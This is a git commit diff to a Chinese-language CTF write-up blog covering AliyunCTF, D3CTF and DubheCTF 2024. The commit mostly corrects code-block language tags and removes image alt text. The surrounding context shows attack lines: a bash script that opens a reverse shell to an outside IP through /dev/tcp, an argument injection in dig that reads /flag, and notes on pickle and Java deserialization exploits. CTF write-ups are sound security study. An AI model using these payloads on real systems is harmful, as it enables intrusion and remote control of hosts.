wip: update language tag of code block, remove alt text of image

S1uM4i · May 28, 2024 · 83f831c · 83f831c
1 parent f012ecf
commit 83f831c
Show file tree

Hide file tree

Showing 5 changed files with 55 additions and 67 deletions.
diff --git a/source/_posts/2024-AliyunCTF.md b/source/_posts/2024-AliyunCTF.md
@@ -294,7 +294,7 @@ string s1, string s2, string s3, string s4, string s5, string s6 -> int {
 
 ## BadApple
 
-```Python
+```javascript
 let abuf = new ArrayBuffer(0x10);
 let bbuf = new BigUint64Array(abuf);
 let fbuf = new Float64Array(abuf);
@@ -735,7 +735,7 @@ if __name__ == '__main__':
         main()
 ```
 
-![img](../images/2024-AliyunCTF/20240325204801605.webp)
+![](../images/2024-AliyunCTF/20240325204801605.webp)
 
 ## BabyDH2
 
@@ -1204,7 +1204,7 @@ if __name__ == '__main__':
     g.gao()
 ```
 
-![img](../images/2024-AliyunCTF/20240325204801682.webp)
+![](../images/2024-AliyunCTF/20240325204801682.webp)
 
 # Web
 
@@ -1218,7 +1218,7 @@ https://gtfobins.github.io/gtfobins/dig/
 {"domain":"l1nyz-tel.cc","type":"-f/flag"}
 ```
 
-![img](../images/2024-AliyunCTF/20240325204801511.webp)
+![](../images/2024-AliyunCTF/20240325204801511.webp)
 
 ## chain17
 
@@ -1401,11 +1401,11 @@ dfs(start)
 
 010打开发现文件中只有UTF-8字符，没有其他数据；一眼盯出，同时存在长得很像的“文”字和类似字
 
-![img](../images/2024-AliyunCTF/20240325204801578.webp)
+![](../images/2024-AliyunCTF/20240325204801578.webp)
 
 换用兼容性不强的艺术字体（图中是字体圈欣意冠黑体）把这些字凸显出来，在Unicode表中检索，可以知道它们都是[康熙部首](https://zhuanlan.zhihu.com/p/352872903)：`assert all([0x2f00 <= ord(c) <= 0x2fdf for c in '⽂⾼⾦⾄⽣⽇⽌⽤⾔⽅⾧⾯⾹⾮⾃⼈⼯⼀⼗⼥⾳⽽⽬⼤⼆⼲⼿⽃⾖⼜⾻⼐⼩⾊⽰⽕⾍⽅⿎⽴⼊⾏⽉⽇'])`
 
-![img](../images/2024-AliyunCTF/20240325204801469.webp)
+![](../images/2024-AliyunCTF/20240325204801469.webp)
 
 原文有意义，不太可能是取这种字的字码，也不太可能是两个这种字之间的距离，因为有意义的原文不是这么好构造的。可以尝试把康熙部首和对应的正常字分别变成1和0
 
@@ -1655,7 +1655,7 @@ print(char)
 
 得到332bits，给0和1分别上色，发现如果每14位分为一组，刚好最高位都是0，且存在相同的几行
 
-![img](../images/2024-AliyunCTF/20240325204801445.webp)
+![](../images/2024-AliyunCTF/20240325204801445.webp)
 
 猜测14位编码一个汉字，尝试按区位码处理
 

diff --git a/source/_posts/2024-D3CTF.md b/source/_posts/2024-D3CTF.md
@@ -15,7 +15,7 @@ mathjax: true
 
 ## 1.1 PwnShell
 
-```C
+```php
 <?php
 $libc = "";
 $stack = "";
@@ -144,7 +144,7 @@ s
 
 ## 1.2 write_flag_where
 
-```C
+```python
 import sys
 from pwn import *
 
@@ -516,13 +516,13 @@ requests.post(url, json={ 'stdin': STDIN, 'monad': PAYLOAD1, 'elaina': PAYLOAD2
 
 下载到别人上传的 tar 包之后发现逻辑，然后上车 
 
-![img](../images/2024-D3CTF/image1.webp)
+![](../images/2024-D3CTF/image1.webp)
 
 Exp
 
 /.sandbox-module/bin/install-local-agent.sh 还有start-remote-agent.sh
 
-```C++
+```bash
 #!/usr/bin/env bash
 
 curl test.7b0db8c5.dnslog.store
@@ -533,7 +533,7 @@ bash -c "/bin/bash -i >& /dev/tcp/8.129.42.140/3307 0>&1"
 
 打包，注意z参数
 
-```C++
+```bash
 tar czf 1.tar sandbox .sandbox-module
 ```
 
@@ -791,7 +791,7 @@ Github 上给的 example 中分母就是一个 solve，猜测这里的分母和
 
 代入两个式子后 Coppersmith 或者 gcd 两种方法都能求出 x, y
 
-```Plain
+```python
 x,y=(2150041731351815713171104523921920493220624053206985451744233895108303740469684723305396314365408654901185731316940674743393624005747389336974965252847296612520628261079495101318288878763133399451251, 226424529213344999668721893182041940135510332166374912207004824461410074124256560817809951006519763202279310112144759780123971358841835703176196881303793274922977845173880043211792854018584878197697797884263497201497403074557926911586759787949296373546575946325913789515250)
 from Crypto.Util.number import *
 
@@ -903,7 +903,7 @@ print(L)
 
 爆
 
-```Python
+```c++
 #include <bits/stdc++.h>
 using namespace std;
 
@@ -1026,6 +1026,9 @@ int main(int argc, char const *argv[])
 }
 
 // g++ multi.cpp -O3 -lpthread -o multi
+```
+
+```python
 import random
 secret_KEY = 886
 from task_utils import *
@@ -1091,24 +1094,9 @@ class Gao:
 if __name__ == '__main__':
     g = Gao()
     g.test_get_flag()
-from PIL import Image
-from image_crypto import ImageEncryption, bytes_to_image, image_to_bytes
-
-width, height = 72, 60
+```
 
-tap_list = [[0, 0, 0, 0],
-            [0, 0, 0, 0],
-            [0, 0, 0, 0],
-            [0, 0, 0, 0]]
-chunk_size = 16
-iv = '00000000000000000000000000000000'
-iv = bytes.fromhex(iv)
-enc = ImageEncryption(tap_list=tap_list, iv=iv)
-img_c = Image.open('enc_from_server.png')
-img_cb = image_to_bytes(img_c)
-img_mb = enc.decryption(img_cb)
-img_m = bytes_to_image(img_mb, width, height)
-img_m.save('dec.png')
+```python
 from PIL import Image
 from image_crypto import ImageEncryption, bytes_to_image, image_to_bytes
 
@@ -1129,7 +1117,7 @@ img_m = bytes_to_image(img_mb, width, height)
 img_m.save('dec.png')
 ```
 
-![img](../images/2024-D3CTF/image2.webp)
+![](../images/2024-D3CTF/image2.webp)
 
 ## 3.5 enctwice
 
@@ -1296,7 +1284,7 @@ if __name__ == '__main__':
 
 用伪随机数来决定虚拟机流程的虚拟机。首先打开ida的trace function可以dump出整个大概的执行流程，提取出函数的偏移，然后用idapython脚本可以提取大概的真正有用的汇编指令
 
-```C++
+```python
 from idaapi import *
 from idc import *
 from ida_bytes import *
@@ -1332,7 +1320,7 @@ open(r"C:\Users\xman\Downloads\RandomVM\log.txt").write(final)
 
 随后就是在每个xor和shl下断点
 
-```C++
+```python
 def rotate_left(num, shift):
     if shift >= 8:
         return 0
@@ -1472,7 +1460,7 @@ f.write(f"{num:#x} >> {al} = {(num>>al)&0xffffffffff:#x}\n")
 
 输入0123456789ABCDEFGHIJKLMNOPQRSTUVWXY得到trace：
 
-```Plain
+```c
 0x2324252627 << 4 = 0x3242526270
 0x2324252627 >> 5 = 0x119212931
 0x3242526270 ^ 0x119212931 = 0x335b734b41
@@ -1540,15 +1528,15 @@ D3CTF(TECH-EV0LVE,EMBR@C3-PR0GR3SS)
 
 爆破到 d3ctf{0ut??????????????} 不给爆了 乐
 
-![img](../images/2024-D3CTF/image3.webp)
+![](../images/2024-D3CTF/image3.webp)
 
 18496 = 64 * 17 * 17， 每64byte一组，迷宫一共17*17大，win的条件是触发c000005，需要跑出去迷宫
 
-![img](../images/2024-D3CTF/image4.webp)
+![](../images/2024-D3CTF/image4.webp)
 
 SEH里边根据当前位置的两个常量计算返回地址，num 1,2就是下图data里的两个常量，所以走迷宫，从MSB开始根据每一位是0还是1决定用上边两个还是下边两个计算下一次跳转的位置
 
-![img](../images/2024-D3CTF/image5.webp)
+![](../images/2024-D3CTF/image5.webp)
 
 想走出去最后一次应该计算出一个比较大的值，那从0x406030+18496每64byte切片，然后从FF开始反向搜索，上图每两个cli对应一个flag bit上边是0下边是1，每两个cli里常量上边是*1的下边是*17的
 
@@ -1605,7 +1593,7 @@ for a in range(33, 127):
 f.close()
 ```
 
-![img](../images/2024-D3CTF/image6.webp)
+![](../images/2024-D3CTF/image6.webp)
 
 ## 4.4 ezjunk
 
@@ -1621,7 +1609,7 @@ fakeflag和flag在tea上无区别
 
 **crc校验：**
 
-![img](../images/2024-D3CTF/image7.webp)
+![](../images/2024-D3CTF/image7.webp)
 
 exp：
 
@@ -1735,7 +1723,7 @@ https://koalastothemax%com/?aHR0cMM6Ly9rLnBvc3RpbWcuY2MvOVh4MHhmc1svZmxh_y5ebmc=
 
 附件里有一个 OpenVPN 配置，但是缺少了 TLS key 部份。然后题目说缺失的部份在前往 `2a13:b487:11aa::d3:c7f:2f` 的路径上。所以就 mtr 一下，得到：
 
-![img](../images/2024-D3CTF/image8.webp)
+![](../images/2024-D3CTF/image8.webp)
 
 按顺序拼起来就是 TLS key，而且长度刚好是整数。有了完整配置之后，就能通过 OpenVPN 连上实例。
 
@@ -1751,4 +1739,4 @@ https://koalastothemax%com/?aHR0cMM6Ly9rLnBvc3RpbWcuY2MvOVh4MHhmc1svZmxh_y5ebmc=
 
 在activity里有flag
 
-![img](../images/2024-D3CTF/image9.webp)
+![](../images/2024-D3CTF/image9.webp)
diff --git a/source/_posts/2024-DubheCTF.md b/source/_posts/2024-DubheCTF.md
@@ -18,9 +18,9 @@ toc: true
 
 根据提示开始脑洞，githack dump 源码
 
-![img](../images/2024-DubheCTF/20240319010444813.webp)
+![](../images/2024-DubheCTF/20240319010444813.webp)
 
-![img](../images/2024-DubheCTF/20240319010444894.webp)
+![](../images/2024-DubheCTF/20240319010444894.webp)
 
 通过 `range: bytes={start}-{end}` 来读取 mem 中的密钥，伪造成 admin 上传 pt 文件，之后 torch load 的时候触发 pickle 反序列化。
 
@@ -156,7 +156,7 @@ if __name__ == '__main__':
 
 Pickle 反序列化的时候，exec 执行一段 python 代码，新建一个 `@app.post("/")` 路由（相当于内存马？
 
-![img](../images/2024-DubheCTF/20240319010444749.webp)
+![](../images/2024-DubheCTF/20240319010444749.webp)
 
 将 bot 发送的东西都写到一个文件里，弹 shell 进去 cat 看看即可
 
@@ -297,7 +297,7 @@ http://1.95.13.243:49319/getlocal?path=/app/pref.yml
 
 同时看到没有打开 cache 功能
 
-![img](../images/2024-DubheCTF/20240319010444775.webp)
+![](../images/2024-DubheCTF/20240319010444775.webp)
 
 需要找另一个文件写入点
 
@@ -322,15 +322,15 @@ function parse(x) {
 
 http://1.95.13.243:49319/sub?target=clash&url=script:pref.yml&token=189069462103782304169366230
 
-![img](../images/2024-DubheCTF/20240319010444751.webp)
+![](../images/2024-DubheCTF/20240319010444751.webp)
 
 ## Javolution
 
 游戏逻辑有一个负数溢出？反正打败恶龙了.jpg
 
 http://1.95.54.152:34473/pal/cheat?hp=-1000000000&attack=-1000000000&defense=-1000000000
 
-![img](../images/2024-DubheCTF/20240319010444758.webp)
+![](../images/2024-DubheCTF/20240319010444758.webp)
 
 然后 level 变 50 
 
@@ -350,7 +350,7 @@ Jdk 17 反序列化
 --add-opens java.xml/``com.sun.org``.apache.xpath.internal.objects=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED
 ```
 
-![img](../images/2024-DubheCTF/20240319010444936.webp)
+![](../images/2024-DubheCTF/20240319010444936.webp)
 
 ```Java
 import com.fasterxml.jackson.databind.node.POJONode;
@@ -720,7 +720,7 @@ for t in range(0, 257):
         pass
 ```
 
-![img](../images/2024-DubheCTF/20240319010444891.webp)
+![](../images/2024-DubheCTF/20240319010444891.webp)
 
 你永远可以相信可靠的J神逆出来的代码不会有任何问题 
 
@@ -921,7 +921,7 @@ sh.interactive()
 print(open('/flag').read())
 ```
 
-![img](../images/2024-DubheCTF/20240319010444993.webp)
+![](../images/2024-DubheCTF/20240319010444993.webp)
 
 ```
 DubheCTF{l3HC7F_h45_4_8e77ER_Ch4lLEngE!}
@@ -999,7 +999,7 @@ alt-svc: h3=":443"; ma=86400
 
 搭好这个隧道之后，就可以用 https://devtools.devprod.cloudflare.dev 连接这个 inspect 端口对 wrangler 项目进行调试。不过断点貌似不是很好下，不过可以在 Memory 里直接把整个 heap snapshot 导出，导出之后搜索一下 flag 就可以了。
 
-![img](../images/2024-DubheCTF/20240319010444931.webp)
+![](../images/2024-DubheCTF/20240319010444931.webp)
 
 ## no more taowa
 
@@ -1504,7 +1504,7 @@ if __name__ == '__main__':
     #     print(png_judge_type('./lsb_msb_test/' + f))
 ```
 
-![img](../images/2024-DubheCTF/20240319010445007.webp)
+![](../images/2024-DubheCTF/20240319010445007.webp)
 
 ```
 DubheCTF{j00_H4V3_m4573r3d_m47Ry05HK4_d0Ll2!}